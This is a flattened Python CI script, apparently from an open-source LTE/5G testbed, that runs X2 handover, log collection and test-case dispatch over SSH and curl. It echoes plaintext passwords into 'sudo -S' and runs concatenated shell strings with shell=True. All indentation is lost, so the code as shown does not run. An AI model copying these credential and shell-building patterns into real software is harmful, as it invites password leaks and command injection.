cmd = "curl -XPOST http://" + EPC.IPAddress() + ":9999/rrc/ho/senb/" + str(self.x2ENBBsIds[0][cnt]) + "/ue/" + str(self.x2ENBConnectedUEs[0][cnt][ueIdx]) + "/tenb/" + str(self.x2ENBBsIds[0][eNB_cnt - cnt - 1])
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
ueIdx += 1
cnt += 1
time.sleep(10)
# check
logging.debug("Checking the Status after X2 Handover")
fullMessage += self.X2_Status(1, self.testCase_id + '_post_ho.json')
cnt = 0
x2Status = True
while cnt < eNB_cnt:
if len(self.x2ENBConnectedUEs[0][cnt]) == len(self.x2ENBConnectedUEs[1][cnt]):
x2Status = False
cnt += 1
if x2Status:
msg = "X2 Handover was successful"
logging.debug(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
HTML.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
msg = "X2 Handover FAILED"
logging.error(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
HTML.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
HTML.CreateHtmlTestRow('Cannot perform requested X2 Handover', 'KO', CONST.ALL_PROCESSES_OK)
def LogCollectBuild(self):
if (RAN.eNBIPAddress != '' and RAN.eNBUserName != '' and RAN.eNBPassword != ''):
IPAddress = RAN.eNBIPAddress
UserName = RAN.eNBUserName
Password = RAN.eNBPassword
SourceCodePath = RAN.eNBSourceCodePath
elif (self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != ''):
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
SourceCodePath = self.UESourceCodePath
else:
sys.exit('Insufficient Parameter')
SSH.open(IPAddress, UserName, Password)
SSH.command('cd ' + SourceCodePath, '\$', 5)
SSH.command('cd cmake_targets', '\$', 5)
SSH.command('rm -f build.log.zip', '\$', 5)
SSH.command('zip build.log.zip build_log_*/*', '\$', 60)
SSH.close()
def LogCollectPing(self):
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
SSH.command('cd scripts', '\$', 5)
SSH.command('rm -f ping.log.zip', '\$', 5)
SSH.command('zip ping.log.zip ping*.log', '\$', 60)
SSH.command('rm ping*.log', '\$', 5)
SSH.close()
def LogCollectIperf(self):
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
SSH.command('cd scripts', '\$', 5)
SSH.command('rm -f iperf.log.zip', '\$', 5)
SSH.command('zip iperf.log.zip iperf*.log', '\$', 60)
SSH.command('rm iperf*.log', '\$', 5)
SSH.close()
def LogCollectOAIUE(self):
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('cd ' + self.UESourceCodePath, '\$', 5)
SSH.command('cd cmake_targets', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -f ue.log.zip', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S zip ue.log.zip ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 60)
SSH.command('echo ' + self.UEPassword + ' | sudo -S rm ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 5)
SSH.close()
def RetrieveSystemVersion(self, machine):
if RAN.eNBIPAddress == 'none' or self.UEIPAddress == 'none':
HTML.OsVersion[0]='Ubuntu 16.04.5 LTS'
HTML.KernelVersion[0]='4.15.0-45-generic'
HTML.UhdVersion[0]='3.13.0.1-0'
HTML.UsrpBoard[0]='B210'
HTML.CpuNb[0]='4'
HTML.CpuModel[0]='Intel(R) Core(TM) i5-6200U'
HTML.CpuMHz[0]='2399.996 MHz'
return 0
if machine == 'eNB':
if RAN.eNBIPAddress != '' and RAN.eNBUserName != '' and RAN.eNBPassword != '':
IPAddress = RAN.eNBIPAddress
UserName = RAN.eNBUserName
Password = RAN.eNBPassword
idx = 0
else:
return -1
if machine == 'UE':
if self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != '':
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
idx = 1
else:
return -1
SSH.open(IPAddress, UserName, Password)
SSH.command('lsb_release -a', '\$', 5)
result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', SSH.getBefore())
if result is not None:
OsVersion = result.group('os_type')
logging.debug('OS is: ' + OsVersion)
HTML.OsVersion[idx]=OsVersion
else:
SSH.command('hostnamectl', '\$', 5)
result = re.search('Operating System: (?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', SSH.getBefore())
if result is not None:
OsVersion = result.group('os_type')
if OsVersion == 'CentOS Linux 7 ':
SSH.command('cat /etc/redhat-release', '\$', 5)
result = re.search('CentOS Linux release (?P<os_version>[0-9\.]+)', SSH.getBefore())
if result is not None:
OsVersion = OsVersion.replace('7 ', result.group('os_version'))
logging.debug('OS is: ' + OsVersion)
HTML.OsVersion[idx]=OsVersion
SSH.command('uname -r', '\$', 5)
result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', SSH.getBefore())
if result is not None:
KernelVersion = result.group('kernel_version')
logging.debug('Kernel Version is: ' + KernelVersion)
HTML.KernelVersion[idx]=KernelVersion
SSH.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', SSH.getBefore())
if result is not None:
UhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + UhdVersion)
HTML.UhdVersion[idx]=UhdVersion
else:
SSH.command('uhd_config_info --version', '\$', 5)
result = re.search('UHD (?P<uhd_version>[a-zA-Z0-9\.\-]+)', SSH.getBefore())
if result is not None:
UhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + UhdVersion)
HTML.UhdVersion[idx]=UhdVersion
SSH.command('echo ' + Password + ' | sudo -S uhd_find_devices', '\$', 60)
usrp_boards = re.findall('product: ([0-9A-Za-z]+)\\\\r\\\\n', SSH.getBefore())
count = 0
for board in usrp_boards:
if count == 0:
UsrpBoard = board
else:
UsrpBoard += ',' + board
count += 1
if count > 0:
logging.debug('USRP Board(s) : ' + UsrpBoard)
HTML.UsrpBoard[idx]=UsrpBoard
SSH.command('lscpu', '\$', 5)
result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', SSH.getBefore())
if result is not None:
CpuNb = result.group('nb_cpus')
logging.debug('nb_cpus: ' + CpuNb)
HTML.CpuNb[idx]=CpuNb
CpuModel = result.group('model')
logging.debug('model: ' + CpuModel)
HTML.CpuModel[idx]=CpuModel
CpuMHz = result.group('cpu_mhz') + ' MHz'
logging.debug('cpu_mhz: ' + CpuMHz)
HTML.CpuMHz[idx]=CpuMHz
SSH.close()
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# General Functions
#-----------------------------------------------------------
def CheckClassValidity(xml_class_list,action,id):
if action not in xml_class_list:
logging.debug('ERROR: test-case ' + id + ' has unlisted class ' + action + ' ##CHECK xml_class_list.yml')
resp=False
else:
resp=True
return resp
#assigning parameters to object instance attributes (even if the attributes do not exist !!)
def AssignParams(params_dict):
for key,value in params_dict.items():
setattr(CiTestObj, key, value)
setattr(RAN, key, value)
setattr(HTML, key, value)
setattr(ldpc, key, value)
def GetParametersFromXML(action):
if action == 'Build_eNB':
RAN.Build_eNB_args=test.findtext('Build_eNB_args')
forced_workspace_cleanup = test.findtext('forced_workspace_cleanup')
if (forced_workspace_cleanup is None):
RAN.Build_eNB_forced_workspace_cleanup=False
else:
if re.match('true', forced_workspace_cleanup, re.IGNORECASE):
RAN.Build_eNB_forced_workspace_cleanup=True
else:
RAN.Build_eNB_forced_workspace_cleanup=False
eNB_instance=test.findtext('eNB_instance')
if (eNB_instance is None):
RAN.eNB_instance=0
else:
RAN.eNB_instance=int(eNB_instance)
RAN.eNB_serverId=test.findtext('eNB_serverId')
if (RAN.eNB_serverId is None):
RAN.eNB_serverId='0'
xmlBgBuildField = test.findtext('backgroundBuild')
if (xmlBgBuildField is None):
RAN.backgroundBuild=False
else:
if re.match('true', xmlBgBuildField, re.IGNORECASE):
RAN.backgroundBuild=True
else:
RAN.backgroundBuild=False
elif action == 'WaitEndBuild_eNB':
RAN.Build_eNB_args=test.findtext('Build_eNB_args')
eNB_instance=test.findtext('eNB_instance')
if (eNB_instance is None):
RAN.eNB_instance=0
else:
RAN.eNB_instance=int(eNB_instance)
RAN.eNB_serverId=test.findtext('eNB_serverId')
if (RAN.eNB_serverId is None):
RAN.eNB_serverId='0'
elif action == 'Initialize_eNB':
RAN.Initialize_eNB_args=test.findtext('Initialize_eNB_args')
eNB_instance=test.findtext('eNB_instance')
if (eNB_instance is None):
RAN.eNB_instance=0
else:
RAN.eNB_instance=int(eNB_instance)
RAN.eNB_serverId=test.findtext('eNB_serverId')
if (RAN.eNB_serverId is None):
RAN.eNB_serverId='0'
#local variable air_interface
air_interface = test.findtext('air_interface')
if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
RAN.air_interface[RAN.eNB_instance] = 'lte-softmodem'
elif (air_interface.lower() in ['nr','lte']):
RAN.air_interface[RAN.eNB_instance] = air_interface.lower() +'-softmodem'
else :
RAN.air_interface[RAN.eNB_instance] = 'ocp-enb'
elif action == 'Terminate_eNB':
eNB_instance=test.findtext('eNB_instance')
if (eNB_instance is None):
RAN.eNB_instance=0
else:
RAN.eNB_instance=int(eNB_instance)
RAN.eNB_serverId=test.findtext('eNB_serverId')
if (RAN.eNB_serverId is None):
RAN.eNB_serverId='0'
#local variable air_interface
air_interface = test.findtext('air_interface')
if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
RAN.air_interface[RAN.eNB_instance] = 'lte-softmodem'
elif (air_interface.lower() in ['nr','lte']):
RAN.air_interface[RAN.eNB_instance] = air_interface.lower() +'-softmodem'
else :
RAN.air_interface[RAN.eNB_instance] = 'ocp-enb'
elif action == 'Attach_UE':
nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
if (nbMaxUEtoAttach is None):
CiTestObj.nbMaxUEtoAttach = -1
else:
CiTestObj.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
elif action == 'CheckStatusUE':
expectedNBUE = test.findtext('expectedNbOfConnectedUEs')
if (expectedNBUE is None):
CiTestObj.expectedNbOfConnectedUEs = -1
else:
CiTestObj.expectedNbOfConnectedUEs = int(expectedNBUE)
elif action == 'Build_OAI_UE':
CiTestObj.Build_OAI_UE_args = test.findtext('Build_OAI_UE_args')
CiTestObj.clean_repository = test.findtext('clean_repository')
if (CiTestObj.clean_repository == 'false'):
CiTestObj.clean_repository = False
else:
CiTestObj.clean_repository = True
elif action == 'Initialize_OAI_UE':
CiTestObj.Initialize_OAI_UE_args = test.findtext('Initialize_OAI_UE_args')
UE_instance = test.findtext('UE_instance')
if (UE_instance is None):
CiTestObj.UE_instance = 0
else:
CiTestObj.UE_instance = UE_instance
#local variable air_interface
air_interface = test.findtext('air_interface')
if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
CiTestObj.air_interface = 'lte-uesoftmodem'
elif (air_interface.lower() in ['nr','lte']):
CiTestObj.air_interface = air_interface.lower() +'-uesoftmodem'
else :
#CiTestObj.air_interface = 'ocp-enb'
logging.error('OCP UE -- NOT SUPPORTED')
elif action == 'Terminate_OAI_UE':
UE_instance=test.findtext('UE_instance')
if (UE_instance is None):
CiTestObj.UE_instance = '0'
else:
CiTestObj.UE_instance = int(UE_instance)
#local variable air_interface
air_interface = test.findtext('air_interface')
if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
CiTestObj.air_interface = 'lte-uesoftmodem'
elif (air_interface.lower() in ['nr','lte']):
CiTestObj.air_interface = air_interface.lower() +'-uesoftmodem'
else :
#CiTestObj.air_interface = 'ocp-enb'
logging.error('OCP UE -- NOT SUPPORTED')
elif (action == 'Ping') or (action == 'Ping_CatM_module'):
CiTestObj.ping_args = test.findtext('ping_args')
CiTestObj.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
elif action == 'Iperf':
CiTestObj.iperf_args = test.findtext('iperf_args')
CiTestObj.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
CiTestObj.iperf_profile = test.findtext('iperf_profile')
if (CiTestObj.iperf_profile is None):
CiTestObj.iperf_profile = 'balanced'
else:
if CiTestObj.iperf_profile != 'balanced' and CiTestObj.iperf_profile != 'unbalanced' and CiTestObj.iperf_profile != 'single-ue':
logging.debug('ERROR: test-case has wrong profile ' + CiTestObj.iperf_profile)
CiTestObj.iperf_profile = 'balanced'
CiTestObj.iperf_options = test.findtext('iperf_options')
if (CiTestObj.iperf_options is None):
CiTestObj.iperf_options = 'check'
else:
if CiTestObj.iperf_options != 'check' and CiTestObj.iperf_options != 'sink':
logging.debug('ERROR: test-case has wrong option ' + CiTestObj.iperf_options)
CiTestObj.iperf_options = 'check'
elif action == 'IdleSleep':
string_field = test.findtext('idle_sleep_time_in_sec')
if (string_field is None):
CiTestObj.idle_sleep_time = 5
else:
CiTestObj.idle_sleep_time = int(string_field)
elif action == 'Perform_X2_Handover':
string_field = test.findtext('x2_ho_options')
if (string_field is None):
CiTestObj.x2_ho_options = 'network'
else:
if string_field != 'network':
logging.error('ERROR: test-case has wrong option ' + string_field)
CiTestObj.x2_ho_options = 'network'
else:
CiTestObj.x2_ho_options = string_field
elif action == 'Build_PhySim':
ldpc.buildargs = test.findtext('physim_build_args')
forced_workspace_cleanup = test.findtext('forced_workspace_cleanup')
if (forced_workspace_cleanup is None):
ldpc.forced_workspace_cleanup=False
else:
if re.match('true', forced_workspace_cleanup, re.IGNORECASE):
ldpc.forced_workspace_cleanup=True
else:
ldpc.forced_workspace_cleanup=False
else: # ie action == 'Run_PhySim':
ldpc.runargs = test.findtext('physim_run_args')
#check if given test is in list
#it is in list if one of the strings in 'list' is at the beginning of 'test'
def test_in_list(test, list):
for check in list:
check=check.replace('+','')
if (test.startswith(check)):
return True
return False
def receive_signal(signum, frame):
sys.exit(1)
#-----------------------------------------------------------
# MAIN PART
#-----------------------------------------------------------
#loading xml action list from yaml
import yaml
xml_class_list_file='xml_class_list.yml'
if (os.path.isfile(xml_class_list_file)):
yaml_file=xml_class_list_file
elif (os.path.isfile('ci-scripts/'+xml_class_list_file)):
yaml_file='ci-scripts/'+xml_class_list_file
else:
logging.error("XML action list yaml file cannot be found")
sys.exit("XML action list yaml file cannot be found")
with open(yaml_file,'r') as f:
# The FullLoader parameter handles the conversion-$
#from YAML scalar values to Python dictionary format$
xml_class_list = yaml.load(f,Loader=yaml.FullLoader)
mode = ''
CiTestObj = OaiCiTest()
SSH = sshconnection.SSHConnection()
EPC = epc.EPCManagement()
RAN = ran.RANManagement()
HTML = html.HTMLManagement()
EPC.htmlObj=HTML
RAN.htmlObj=HTML
RAN.epcObj=EPC
ldpc=cls_physim.PhySim() #create an instance for LDPC test using GPU or CPU build
#-----------------------------------------------------------
# Parsing Command Line Arguments
#-----------------------------------------------------------
import args_parse
py_param_file_present, py_params, mode = args_parse.ArgsParse(sys.argv,CiTestObj,RAN,HTML,EPC,ldpc,HELP)
#-----------------------------------------------------------
# TEMPORARY params management
#-----------------------------------------------------------
#temporary solution for testing:
if py_param_file_present == True:
AssignParams(py_params)
#for debug
#print(RAN.__dict__)
#print(CiTestObj.__dict__)
#print(HTML.__dict__)
#print(ldpc.__dict__)
#for debug
#-----------------------------------------------------------
# COTS UE instanciation
#-----------------------------------------------------------
#COTS_UE instanciation and ADB server init
#ue id and ue mode are retrieved from xml
COTS_UE=cls_cots_ue.CotsUe(CiTestObj.ADBIPAddress, CiTestObj.ADBUserName,CiTestObj.ADBPassword)
#-----------------------------------------------------------
# XML class (action) analysis
#-----------------------------------------------------------
cwd = os.getcwd()
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
RAN.eNB_serverId='0'
RAN.eNB_instance=0
RAN.eNBSourceCodePath='/tmp/'
RAN.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
if (CiTestObj.ADBIPAddress == '' or CiTestObj.ADBUserName == '' or CiTestObj.ADBPassword == ''):
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
CiTestObj.TerminateUE()
elif re.match('^TerminateOAIUE$', mode, re.IGNORECASE):
if CiTestObj.UEIPAddress == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
CiTestObj.TerminateOAIUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
EPC.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
EPC.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath== '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
EPC.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
if (RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '') and (CiTestObj.UEIPAddress == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '' or CiTestObj.UESourceCodePath == ''):
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
CiTestObj.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
RAN.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
EPC.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
EPC.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
EPC.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
CiTestObj.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
CiTestObj.LogCollectIperf()
elif re.match('^LogCollectOAIUE$', mode, re.IGNORECASE):
if CiTestObj.UEIPAddress == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '' or CiTestObj.UESourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
CiTestObj.LogCollectOAIUE()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
if (CiTestObj.ADBIPAddress == '' or CiTestObj.ADBUserName == '' or CiTestObj.ADBPassword == ''):
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
count = 0
foundCount = 0
while (count < HTML.nbTestXMLfiles):
#xml_test_file = cwd + "/" + CiTestObj.testXMLfiles[count]
xml_test_file = sys.path[0] + "/" + CiTestObj.testXMLfiles[count]
if (os.path.isfile(xml_test_file)):
try:
xmlTree = ET.parse(xml_test_file)
except:
print("Error while parsing file: " + xml_test_file)
xmlRoot = xmlTree.getroot()
HTML.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
HTML.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='test-tab-' + str(count)))
HTML.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
foundCount += 1
count += 1
if foundCount != HTML.nbTestXMLfiles:
HTML.nbTestXMLfiles=foundCount
if (CiTestObj.ADBIPAddress != 'none'):
terminate_ue_flag = False
CiTestObj.GetAllUEDevices(terminate_ue_flag)
CiTestObj.GetAllCatMDevices(terminate_ue_flag)
HTML.SethtmlUEConnected(len(CiTestObj.UEDevices) + len(CiTestObj.CatMDevices))
HTML.htmlNb_Smartphones=len(CiTestObj.UEDevices)
HTML.htmlNb_CATM_Modules=len(CiTestObj.CatMDevices)
HTML.CreateHtmlHeader(CiTestObj.ADBIPAddress)
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML footer \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
CiTestObj.RetrieveSystemVersion('eNB')
CiTestObj.RetrieveSystemVersion('UE')
HTML.CreateHtmlFooter(CiTestObj.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE) or re.match('^TestUE$', mode, re.IGNORECASE):
if re.match('^TesteNB$', mode, re.IGNORECASE):
if RAN.eNBIPAddress == '' or RAN.ranRepository == '' or RAN.ranBranch == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '' or EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '' or CiTestObj.ADBIPAddress == '' or CiTestObj.ADBUserName == '' or CiTestObj.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '' or EPC.Type == '':
HELP.EPCSrvHelp(EPC.IPAddress, EPC.UserName, EPC.Password, EPC.SourceCodePath, EPC.Type)
if RAN.ranRepository == '':
HELP.GitSrvHelp(RAN.ranRepository, RAN.ranBranch, RAN.ranCommitID, RAN.ranAllowMerge, RAN.ranTargetBranch)
if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '':
HELP.eNBSrvHelp(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath)
sys.exit('Insufficient Parameter')
if (EPC.IPAddress!= '') and (EPC.IPAddress != 'none'):
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, cwd + "/tcp_iperf_stats.awk", "/tmp")
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, cwd + "/active_net_interfaces.awk", "/tmp")
else:
if CiTestObj.UEIPAddress == '' or CiTestObj.ranRepository == '' or CiTestObj.ranBranch == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '' or CiTestObj.UESourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('UE: Insufficient Parameter')
#read test_case_list.xml file
# if no parameters for XML file, use default value
if (HTML.nbTestXMLfiles != 1):
xml_test_file = cwd + "/test_case_list.xml"
else:
xml_test_file = cwd + "/" + CiTestObj.testXMLfiles[0]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
if (HTML.nbTestXMLfiles == 1):
HTML.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
HTML.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-0'))
repeatCount = xmlRoot.findtext('repeatCount',default='1')
CiTestObj.repeatCounts.append(int(repeatCount))
all_tests=xmlRoot.findall('testCase')
exclusion_tests=exclusion_tests.split()
requested_tests=requested_tests.split()
#check that exclusion tests are well formatted
#(6 digits or less than 6 digits followed by +)
for test in exclusion_tests:
if (not re.match('^[0-9]{6}$', test) and
not re.match('^[0-9]{1,5}\+$', test)):
logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
sys.exit(1)
else:
logging.debug(test)
#check that requested tests are well formatted
#(6 digits or less than 6 digits followed by +)
#be verbose
for test in requested_tests:
if (re.match('^[0-9]{6}$', test) or
re.match('^[0-9]{1,5}\+$', test)):
logging.debug('INFO: test group/case requested: ' + test)
else:
logging.debug('ERROR: requested test is invalidly formatted: ' + test)
sys.exit(1)
if (EPC.IPAddress != '') and (EPC.IPAddress != 'none'):
CiTestObj.CheckFlexranCtrlInstallation()
EPC.SetMmeIPAddress()
#get the list of tests to be done
todo_tests=[]
for test in requested_tests:
if (test_in_list(test, exclusion_tests)):
logging.debug('INFO: test will be skipped: ' + test)
else:
#logging.debug('INFO: test will be run: ' + test)
todo_tests.append(test)
signal.signal(signal.SIGUSR1, receive_signal)
if (CiTestObj.ADBIPAddress != 'none'):
terminate_ue_flag = False
CiTestObj.GetAllUEDevices(terminate_ue_flag)
CiTestObj.GetAllCatMDevices(terminate_ue_flag)
else:
CiTestObj.UEDevices.append('OAI-UE')
HTML.SethtmlUEConnected(len(CiTestObj.UEDevices) + len(CiTestObj.CatMDevices))
HTML.CreateHtmlTabHeader()
CiTestObj.FailReportCnt = 0
RAN.prematureExit=True
HTML.startTime=int(round(time.time() * 1000))
while CiTestObj.FailReportCnt < CiTestObj.repeatCounts[0] and RAN.prematureExit:
RAN.prematureExit=False
# At every iteratin of the retry loop, a separator will be added
# pass CiTestObj.FailReportCnt as parameter of HTML.CreateHtmlRetrySeparator
HTML.CreateHtmlRetrySeparator(CiTestObj.FailReportCnt)
for test_case_id in todo_tests:
if RAN.prematureExit:
break
for test in all_tests:
if RAN.prematureExit:
break
id = test.get('id')
if test_case_id != id:
continue
CiTestObj.testCase_id = id
HTML.testCase_id=CiTestObj.testCase_id
EPC.testCase_id=CiTestObj.testCase_id
CiTestObj.desc = test.findtext('desc')
HTML.desc=CiTestObj.desc
action = test.findtext('class')
if (CheckClassValidity(xml_class_list, action, id) == False):
continue
CiTestObj.ShowTestID()
GetParametersFromXML(action)
if action == 'Initialize_UE' or action == 'Attach_UE' or action == 'Detach_UE' or action == 'Ping' or action == 'Iperf' or action == 'Reboot_UE' or action == 'DataDisable_UE' or action == 'DataEnable_UE' or action == 'CheckStatusUE':
if (CiTestObj.ADBIPAddress != 'none'):
#in these cases, having no devices is critical, GetAllUEDevices function has to manage it as a critical error, reason why terminate_ue_flag is set to True
terminate_ue_flag = True
CiTestObj.GetAllUEDevices(terminate_ue_flag)
if action == 'Build_eNB':
RAN.BuildeNB()
elif action == 'WaitEndBuild_eNB':
RAN.WaitBuildeNBisFinished()
elif action == 'Initialize_eNB':
check_eNB = False
check_OAI_UE = False
RAN.pStatus=CiTestObj.CheckProcessExist(check_eNB, check_OAI_UE)
RAN.InitializeeNB()
elif action == 'Terminate_eNB':
RAN.TerminateeNB()
elif action == 'Initialize_UE':
CiTestObj.InitializeUE()
elif action == 'Terminate_UE':
CiTestObj.TerminateUE()
elif action == 'Attach_UE':
CiTestObj.AttachUE()
elif action == 'Detach_UE':
CiTestObj.DetachUE()
elif action == 'DataDisable_UE':
CiTestObj.DataDisableUE()
elif action == 'DataEnable_UE':
CiTestObj.DataEnableUE()
elif action == 'CheckStatusUE':
CiTestObj.CheckStatusUE()
elif action == 'Build_OAI_UE':
CiTestObj.BuildOAIUE()
elif action == 'Initialize_OAI_UE':
CiTestObj.InitializeOAIUE()
elif action == 'Terminate_OAI_UE':
CiTestObj.TerminateOAIUE()
elif action == 'Initialize_CatM_module':
CiTestObj.InitializeCatM()
elif action == 'Terminate_CatM_module':
CiTestObj.TerminateCatM()
elif action == 'Attach_CatM_module':
CiTestObj.AttachCatM()
elif action == 'Detach_CatM_module':
CiTestObj.TerminateCatM()
elif action == 'Ping_CatM_module':
CiTestObj.PingCatM()
elif action == 'Ping':
CiTestObj.Ping()
elif action == 'Iperf':
CiTestObj.Iperf()
elif action == 'Reboot_UE':
CiTestObj.RebootUE()
elif action == 'Initialize_HSS':
EPC.InitializeHSS()
elif action == 'Terminate_HSS':
EPC.TerminateHSS()
elif action == 'Initialize_MME':
EPC.InitializeMME()
elif action == 'Terminate_MME':
EPC.TerminateMME()
elif action == 'Initialize_SPGW':
EPC.InitializeSPGW()
elif action == 'Terminate_SPGW':
EPC.TerminateSPGW()
elif action == 'Initialize_FlexranCtrl':
CiTestObj.InitializeFlexranCtrl()
elif action == 'Terminate_FlexranCtrl':
CiTestObj.TerminateFlexranCtrl()
